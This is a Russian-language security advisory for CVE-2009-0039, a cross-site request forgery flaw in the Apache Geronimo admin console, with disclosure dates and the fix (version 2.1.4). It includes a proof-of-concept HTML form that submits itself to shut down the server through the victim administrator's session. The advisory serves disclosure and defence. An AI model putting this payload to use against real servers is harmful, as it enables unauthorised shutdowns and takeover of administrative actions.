CVE-2009-0039

Вендор

Apache

Продукт

Apache Geronimo Application Server 

Тип уязвимости

Подделка межсайтовых запросов

Reported

10.12.2008

Date of Public Advisory

16.04.2009

Детальное описание

Уязвимость позволяет удаленному злоумышленнику выполнять различные административные действия, такие, как смена пароля администратора, загрузка файлов и приложений и др., используя определенные запросы в контексте сессии администратора. 

Пример [Остановка сервера]: 

<html> 
<form action='http://[server]/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0' id=1> 
<input type=hidden value='Shutdown' name="shutdown"> 
<input type=submit> 
</form> 
</html> 
<script> 
document.getElementById(1).submit(); 
</script> 

Решение: 

Уязвимости исправлены в релизе Geronimo 2.1.4. 
Новую версию Geronimo 2.1.4 можно загрузить с сайта производителя: 
<a href="http://geronimo.apache.org/downloads.html" target="_blank" rel="noopener">http://geronimo.apache.org/downloads.html</a>

Другой вариант решения (если вы решите не обновлять Apache Geronimo до версии 2.1.4): остановка или удаление консоли администрирования Geronimo Server Console.